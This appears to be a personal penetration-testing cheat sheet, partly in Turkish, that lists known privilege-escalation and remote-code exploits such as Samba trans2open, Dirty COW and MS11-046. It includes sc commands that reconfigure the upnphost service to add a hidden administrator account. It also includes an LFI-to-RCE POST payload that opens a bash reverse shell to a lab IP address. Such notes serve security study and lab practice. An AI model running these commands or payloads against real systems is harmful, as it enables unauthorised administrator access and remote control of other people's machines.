# Common Exploits

## Samba trans2open Overflow (Linux x86) / 10.11.1.22

> This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

## dirty cow exploit

> Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

## Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

## Webdav exploit

> windows/iis/iis\_webdav\_upload\_asp

## linux/samba/trans2open (Samba 2.2.x) - [exploitdb-link](https://www.exploit-db.com/exploits/10) Samba < 2.2.8

> samba servisine yönelik kullanılacak exploit

## Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC

## accesschk.exe

```
# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
```

**Servisin Config Ayarlarını Görmek için**

```
# sc qc upnphost
```

**Servislerin izin kontrolleri**

```
# accesschk-xp.exe  -uwcqv "Authenticated Users" * /accepteula
```

> kullanımı yazılacak

**Notlar**

> Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.

LFI to RCE

```
POST /section.php?page=php://input%00

[HTTP POST DATA] 
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>
```

### ms11-080

{% embed url="<https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html>" %}

\##